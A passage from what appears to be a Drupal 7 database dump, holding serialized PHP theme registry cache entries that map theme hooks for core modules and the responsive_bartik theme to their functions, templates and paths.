functions\";a:0:{}}s:20:\"image_rotate_summary\";a:6:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_rotate_summary\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"image_widget\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_widget\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"image_formatter\";a:6:{s:9:\"variables\";a:3:{s:4:\"item\";N;s:4:\"path\";N;s:11:\"image_style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:21:\"theme_image_formatter\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:21:\"filter_admin_overview\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_admin_overview\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:32:\"filter_admin_format_filter_order\";a:8:{s:14:\"render element\";s:7:\"element\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:38:\"theme_filter_admin_format_filter_order\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"filter_tips\";a:8:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"text_format_wrapper\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:21:\"filter_tips_more_info\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_tips_more_info\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"filter_guidelines\";a:6:{s:9:\"variables\";a:1:{s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:23:\"theme_filter_guidelines\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"file_link\";a:6:{s:9:\"variables\";a:2:{s:4:\"file\";N;s:14:\"icon_directory\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_link\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"file_icon\";a:6:{s:9:\"variables\";a:3:{s:4:\"file\";N;s:14:\"icon_directory\";N;s:3:\"alt\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_icon\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"file_managed_file\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:23:\"theme_file_managed_file\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"file_widget\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:17:\"theme_file_widget\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"file_widget_multiple\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_widget_multiple\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"file_formatter_table\";a:6:{s:9:\"variables\";a:1:{s:5:\"items\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_formatter_table\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:16:\"file_upload_help\";a:6:{s:9:\"variables\";a:2:{s:11:\"description\";N;s:17:\"upload_validators\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:22:\"theme_file_upload_help\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:14:\"field_ui_table\";a:6:{s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/field_ui\";s:8:\"function\";s:20:\"theme_field_ui_table\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"field\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:11:\"theme_field\";s:20:\"preprocess functions\";a:2:{i:0;s:25:\"template_preprocess_field\";i:1;s:20:\"rdf_preprocess_field\";}s:17:\"process functions\";a:1:{i:0;s:22:\"template_process_field\";}}s:25:\"field_multiple_value_form\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:31:\"theme_field_multiple_value_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"dblog_message\";a:8:{s:9:\"variables\";a:2:{s:5:\"event\";N;s:4:\"link\";b:0;}s:4:\"file\";s:15:\"dblog.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/dblog\";s:8:\"function\";s:19:\"theme_dblog_message\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/dblog/dblog.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"dashboard\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:15:\"theme_dashboard\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"dashboard_admin\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:21:\"theme_dashboard_admin\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:16:\"dashboard_region\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:22:\"theme_dashboard_region\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:25:\"dashboard_disabled_blocks\";a:6:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:31:\"theme_dashboard_disabled_blocks\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:24:\"dashboard_disabled_block\";a:6:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:30:\"theme_dashboard_disabled_block\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:28:\"dashboard_admin_display_form\";a:9:{s:8:\"template\";s:24:\"block-admin-display-form\";s:4:\"path\";s:13:\"modules/block\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:48:\"template_preprocess_dashboard_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"comment_block\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:19:\"theme_comment_block\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"comment_preview\";a:6:{s:9:\"variables\";a:1:{s:7:\"comment\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:21:\"theme_comment_preview\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:7:\"comment\";a:6:{s:8:\"template\";s:23:\"modules/comment/comment\";s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_comment\";i:2;s:21:\"contextual_preprocess\";i:3;s:22:\"rdf_preprocess_comment\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:22:\"comment_post_forbidden\";a:6:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:28:\"theme_comment_post_forbidden\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"comment_wrapper\";a:6:{s:8:\"template\";s:31:\"modules/comment/comment-wrapper\";s:14:\"render element\";s:7:\"content\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"color_scheme_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/color\";s:8:\"function\";s:23:\"theme_color_scheme_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:10:\"adsense_ad\";a:6:{s:9:\"variables\";a:3:{s:2:\"ad\";N;s:6:\"module\";N;s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:25:\"sites/all/modules/adsense\";s:8:\"function\";s:16:\"theme_adsense_ad\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"adsense_placeholder\";a:6:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:5:\"width\";i:0;s:6:\"height\";i:0;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:25:\"sites/all/modules/adsense\";s:8:\"function\";s:25:\"theme_adsense_placeholder\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"block\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:19:\"modules/block/block\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";a:8:{s:8:\"template\";s:38:\"modules/block/block-admin-display-form\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:44:\"template_preprocess_block_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}}',0,1444940170,1),('theme_registry:responsive_bartik','a:157:{s:9:\"menu_tree\";a:5:{s:8:\"function\";s:27:\"responsive_bartik_menu_tree\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:4:\"tree\";s:20:\"preprocess functions\";a:1:{i:0;s:29:\"template_preprocess_menu_tree\";}}s:30:\"field__taxonomy_term_reference\";a:5:{s:8:\"function\";s:48:\"responsive_bartik_field__taxonomy_term_reference\";s:14:\"render element\";s:7:\"element\";s:9:\"base hook\";s:5:\"field\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";}s:4:\"page\";a:7:{s:8:\"template\";s:4:\"page\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";i:3;s:30:\"responsive_bartik_process_page\";}}s:15:\"comment_wrapper\";a:7:{s:8:\"template\";s:15:\"comment-wrapper\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:7:\"content\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:16:\"maintenance_page\";a:7:{s:8:\"template\";s:16:\"maintenance-page\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:9:\"variables\";a:2:{s:7:\"content\";N;s:13:\"show_messages\";b:1;}s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:36:\"template_preprocess_maintenance_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:35:\"overlay_preprocess_maintenance_page\";i:4;s:45:\"responsive_bartik_preprocess_maintenance_page\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:33:\"template_process_maintenance_page\";i:2;s:11:\"rdf_process\";i:3;s:42:\"responsive_bartik_process_maintenance_page\";}}s:4:\"html\";a:7:{s:8:\"template\";s:4:\"html\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";i:5;s:33:\"responsive_bartik_preprocess_html\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";i:3;s:30:\"responsive_bartik_process_html\";}}s:7:\"comment\";a:7:{s:8:\"template\";s:7:\"comment\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:8:\"elements\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_comment\";i:2;s:21:\"contextual_preprocess\";i:3;s:22:\"rdf_preprocess_comment\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:4:\"node\";a:7:{s:8:\"template\";s:4:\"node\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";s:14:\"render element\";s:8:\"elements\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_node\";i:2;s:21:\"contextual_preprocess\";i:3;s:19:\"rdf_preprocess_node\";i:4;s:33:\"responsive_bartik_preprocess_node\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:11:\"block__menu\";a:6:{s:8:\"template\";s:11:\"block--menu\";s:4:\"path\";s:44:\"sites/all/themes/responsive_bartik/templates\";s:14:\"render element\";s:8:\"elements\";s:9:\"base hook\";s:5:\"block\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:34:\"sites/all/themes/responsive_bartik\";}s:12:\"user_picture\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:8:\"template\";s:25:\"modules/user/user-picture\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_picture\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_profile\";a:8:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:25:\"modules/user/user-profile\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_profile\";i:2;s:21:\"contextual_preprocess\";i:3;s:27:\"rdf_preprocess_user_profile\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:21:\"user_profile_category\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:34:\"modules/user/user-profile-category\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:41:\"template_preprocess_user_profile_category\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"user_profile_item\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:30:\"modules/user/user-profile-item\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_user_profile_item\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:9:\"user_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"users\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:15:\"theme_user_list\";}s:22:\"user_admin_permissions\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:28:\"theme_user_admin_permissions\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:16:\"user_admin_roles\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:22:\"theme_user_admin_roles\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:27:\"user_permission_description\";a:6:{s:9:\"variables\";a:2:{s:15:\"permission_item\";N;s:4:\"hide\";N;}s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:33:\"theme_user_permission_description\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:14:\"user_signature\";a:4:{s:9:\"variables\";a:1:{s:9:\"signature\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:20:\"theme_user_signature\";}s:26:\"update_manager_update_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"update.manager.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:32:\"theme_update_manager_update_form\";s:8:\"includes\";a:1:{i:0;s:33:\"modules/update/update.manager.inc\";}}s:17:\"update_last_check\";a:4:{s:9:\"variables\";a:1:{s:4:\"last\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:23:\"theme_update_last_check\";}s:13:\"update_report\";a:6:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"file\";s:17:\"update.report.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:19:\"theme_update_report\";s:8:\"includes\";a:1:{i:0;s:32:\"modules/update/update.report.inc\";}}s:14:\"update_version\";a:6:{s:9:\"variables\";a:3:{s:7:\"version\";N;s:3:\"tag\";N;s:5:\"class\";a:0:{}}s:4:\"file\";s:17:\"update.report.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:20:\"theme_update_version\";s:8:\"includes\";a:1:{i:0;s:32:\"modules/update/update.report.inc\";}}s:19:\"update_status_label\";a:6:{s:9:\"variables\";a:1:{s:6:\"status\";N;}s:4:\"file\";s:17:\"update.report.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:25:\"theme_update_status_label\";s:8:\"includes\";a:1:{i:0;s:32:\"modules/update/update.report.inc\";}}s:7:\"toolbar\";a:7:{s:14:\"render element\";s:7:\"toolbar\";s:8:\"template\";s:7:\"toolbar\";s:4:\"path\";s:15:\"modules/toolbar\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:21:\"contextual_preprocess\";i:2;s:26:\"toolbar_preprocess_toolbar\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"toolbar_toggle\";a:4:{s:9:\"variables\";a:2:{s:9:\"collapsed\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:8:\"function\";s:20:\"theme_toolbar_toggle\";}s:30:\"taxonomy_overview_vocabularies\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:8:\"function\";s:36:\"theme_taxonomy_overview_vocabularies\";}s:23:\"taxonomy_overview_terms\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:8:\"function\";s:29:\"theme_taxonomy_overview_terms\";}s:13:\"taxonomy_term\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:30:\"modules/taxonomy/taxonomy-term\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_taxonomy_term\";i:2;s:21:\"contextual_preprocess\";i:3;s:28:\"rdf_preprocess_taxonomy_term\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:4:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";}s:4:\"link\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";}s:5:\"links\";a:4:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";}s:5:\"image\";a:5:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_image\";s:20:\"preprocess functions\";a:1:{i:0;s:20:\"rdf_preprocess_image\";}}s:10:\"breadcrumb\";a:4:{s:9:\"variables\";a:1:{s:10:\"breadcrumb\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_breadcrumb\";}s:4:\"help\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_help\";}s:5:\"table\";a:4:{s:9:\"variables\";a:7:{s:6:\"header\";N;s:4:\"rows\";N;s:10:\"attributes\";a:0:{}s:7:\"caption\";N;s:9:\"colgroups\";a:0:{}s:6:\"sticky\";b:1;s:5:\"empty\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_table\";}s:19:\"tablesort_indicator\";a:4:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_tablesort_indicator\";}s:4:\"mark\";a:4:{s:9:\"variables\";a:1:{s:4:\"type\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_mark\";}s:9:\"item_list\";a:4:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";}s:14:\"more_help_link\";a:4:{s:9:\"variables\";a:1:{s:3:\"url\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_more_help_link\";}s:9:\"feed_icon\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_feed_icon\";}s:9:\"more_link\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_more_link\";}s:8:\"username\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_username\";s:20:\"preprocess functions\";a:2:{i:0;s:28:\"template_preprocess_username\";i:1;s:23:\"rdf_preprocess_username\";}s:17:\"process 